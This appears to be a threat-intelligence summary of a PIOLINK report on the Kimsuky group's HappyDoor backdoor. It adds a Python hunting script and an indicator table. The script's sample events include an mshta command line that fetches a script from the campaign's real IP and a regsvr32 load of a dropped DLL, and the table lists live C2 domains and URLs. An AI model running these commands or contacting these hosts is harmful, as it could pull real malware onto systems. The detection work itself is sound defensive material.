Analysis of Kimsuky Attack Group HappyDoor
2025-08-07 • Piolink • Analysis of Kimsuky attack group HappyDoor
https://www.piolink.com/kr/service/Security-Analysis.php?bbsCode=security&vType=view&idx=148&page=2
PIOLINK analyzed HappyDoor malware activity attributed in the report to the Kimsuky group, described as a North Korea-linked APT focused on espionage against South Korean and other Asian diplomatic, defense, government, and military research targets. The infection chain uses a fake Bandizip installer that drops and launches a legitimate-looking installer while using mshta to retrieve a remote HTML/VBScript payload from 67.217.62.222. The downloaded script collects user, system, IP, and network information, while a VMProtect-packed DLL named 9A4E.tmp is executed through regsvr32 with staged parameters to install, initialize, and run the backdoor from %AppData%\Roaming\AppRoot\. HappyDoor stores configuration and RSA-related data under HKCU\SOFTWARE\Microsoft\Notepad\ and C2 details under HKCU\SOFTWARE\Microsoft\FTP\, then performs data theft functions including screenshots and keylogging and sends encrypted output to C2 URLs such as u.appw.p-e.kr and d.appz.p-e.kr. The campaign shows Kimsuky-style social engineering through trusted software impersonation and reinforces the risk of installing packages from untrusted sources.
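The two LOLBin stages above (mshta pulling a remote script, then regsvr32 loading a .tmp DLL from %AppData%\Roaming\AppRoot\) and the named C2 hosts are concrete enough to hunt for in endpoint telemetry. The following is an added example, not code from PIOLINK or from the report; it assumes Sysmon-style process and DNS events, and the sample events are constructed (the report does not give the exact regsvr32 parameters or the URL path on 67.217.62.222, so neither is reproduced here).

```python
import re
from typing import Dict, List, Tuple

# Indicators quoted from the PIOLINK report; everything else below is constructed.
C2_HOSTS = {"u.appw.p-e.kr", "d.appz.p-e.kr", "67.217.62.222"}
DROP_DIR = re.compile(r"\\AppData\\Roaming\\AppRoot\\", re.I)
REMOTE_URL = re.compile(r"https?://\S+", re.I)
TMP_DLL = re.compile(r"\\[0-9A-F]{4}\.tmp\b", re.I)   # e.g. 9A4E.tmp

def check_process(ev: Dict[str, str]) -> List[str]:
    """Return the names of the hunting rules a process-creation event matches."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    hits: List[str] = []
    if image.endswith("\\mshta.exe") and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_script")      # stage 1: remote HTML/VBScript fetch
    if image.endswith("\\regsvr32.exe") and (TMP_DLL.search(cmd) or DROP_DIR.search(cmd)):
        hits.append("regsvr32_tmp_dll")         # stage 2: .tmp DLL out of AppRoot
    if any(host in cmd for host in C2_HOSTS):
        hits.append("known_c2_in_cmdline")
    return hits

def check_dns(ev: Dict[str, str]) -> List[str]:
    """Flag DNS lookups of the report's C2 domains (case-insensitive)."""
    return ["known_c2_dns"] if ev.get("QueryName", "").lower() in C2_HOSTS else []

def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run every event through the matching checker and keep only the hits."""
    findings = []
    for ev in events:
        hits = check_dns(ev) if ev.get("EventType") == "dns" else check_process(ev)
        if hits:
            findings.append((ev.get("Image") or ev.get("QueryName", ""), hits))
    return findings

# Constructed telemetry: two HappyDoor-like stages, one C2 lookup, two benign events.
SAMPLE_EVENTS = [
    {"EventType": "process", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://67.217.62.222/"},            # path not in report
    {"EventType": "process", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\u\AppData\Roaming\AppRoot\9A4E.tmp"},
    {"EventType": "dns", "QueryName": "d.appz.p-e.kr"},
    {"EventType": "process", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},  # benign
    {"EventType": "dns", "QueryName": "update.example.com"},                # benign
]

if __name__ == "__main__":
    for source, hits in scan(SAMPLE_EVENTS):
        print(f"{source}: {', '.join(hits)}")
```

Pair the process rules with a registry check for HKCU\SOFTWARE\Microsoft\Notepad\ and HKCU\SOFTWARE\Microsoft\FTP\ on any host that fires, since the report places HappyDoor's configuration and C2 data there.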
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | http://u.appw.p-e.kr/index.php | 2025-07-08 | 2025-08-07 |
| URL | http://d.appz.p-e.kr/index.php | 2025-07-08 | 2025-08-07 |
| DOMAIN | u.appw.p-e.kr | 2025-07-08 | 2025-08-07 |
| DOMAIN | d.appz.p-e.kr | 2025-07-08 | 2025-08-07 |
| IPv4 | 67.217.62.222 | 2025-07-08 | 2025-08-07 |